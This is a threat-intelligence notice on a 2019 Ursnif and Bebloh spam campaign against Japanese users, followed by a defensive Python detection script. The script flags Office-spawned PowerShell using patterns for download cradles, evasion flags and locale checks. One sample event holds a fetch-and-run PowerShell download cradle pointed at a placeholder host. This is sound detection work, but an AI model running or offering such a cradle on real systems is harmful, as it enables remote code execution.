Delaware, USA – March 14, 2019 – A new tsunami of spam struck Japan, infecting users with the latest versions of the Ursnif and Bebloh trojans. In the current campaign, adversaries use a version of Ursnif compiled just a few weeks ago that has a number of new features. Researchers at Cybereason recorded a massive spam attack and analyzed the malware used. Adversaries send tens of thousands of emails containing an Excel file with a malicious VBA macro, which runs PowerShell code that performs several checks to make sure that the attacked system not only has Japanese as its primary language but is also physically located in Japan. Next, an image is downloaded from a free image-hosting service, and the script extracts the Bebloh trojan's code from the image and injects it into a system process. In this attack, Bebloh is used as a dropper to fetch the Ursnif loader from the command and control server. Depending on the bitness of the operating system, the loader unpacks an embedded DLL and injects it into the explorer.exe process.
The new version of the trojan, in addition to the extra location checks, has acquired several unpleasant features, such as a new way of maintaining persistence, a bypass for an antivirus solution popular in Japan, and new options for stealing emails and data from cryptocurrency wallets and disk encryption tools. In the past few years, the adversaries behind this Ursnif modification have regularly attacked Japanese users to steal valuable financial information. It is also worth noting that the use of PowerShell in attacks has increased tenfold over the last year. You can leverage the rules for your SIEM tool available in the Threat Detection Marketplace to detect malicious use of PowerShell: https://my.socprime.com/en/tdm/
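As an added example (not code from Cybereason's research or from this notice), the detection logic below scores the Excel-to-PowerShell step of the chain described above over constructed process-creation records; the record field names, the image lists and the command-line indicator patterns are assumptions, not rules from the Threat Detection Marketplace.

```python
"""Rate process-creation events where an Office application spawns PowerShell
with download, evasion or locale-probing traits (assumed indicator set)."""
import ntpath
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Command-line traits that make a macro-spawned PowerShell stand out.
SUSPICIOUS_PATTERNS = {
    "download": re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass": re.compile(r"executionpolicy\s+bypass|-e[px]\s+bypass", re.I),
    # The campaign checks the system language first; these cmdlets are the usual way.
    "locale_check": re.compile(r"get-culture|get-winsystemlocale|currentculture", re.I),
}

SAMPLE_EVENTS = [  # constructed sample records, not real telemetry
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://img-host.invalid/pic.png')\""},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -c Invoke-WebRequest https://updates.invalid/x.ps1"},
    {"id": 3, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -c Get-Date"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
]


def indicators(command_line):
    """Names of the indicator patterns present in a command line, sorted."""
    return sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command_line))


def classify(event):
    """Return (severity, indicators). Office -> PowerShell is always worth review;
    with indicators it is high, without them medium; PowerShell elsewhere with
    indicators is low."""
    parent = ntpath.basename(event["parent_image"]).lower()
    image = ntpath.basename(event["image"]).lower()
    hits = indicators(event["command_line"])
    if image in PS_IMAGES and parent in OFFICE_PARENTS:
        return ("high", hits) if hits else ("medium", hits)
    if image in PS_IMAGES and hits:
        return ("low", hits)
    return ("none", hits)


def scan(events):
    """All (id, severity, indicators) triples for events rated above 'none'."""
    rated = ((e["id"], *classify(e)) for e in events)
    return [r for r in rated if r[1] != "none"]
```

Running `scan(SAMPLE_EVENTS)` rates the Excel-spawned download cradle high, the benign Excel-spawned `Get-Date` medium, and the explorer-spawned download low.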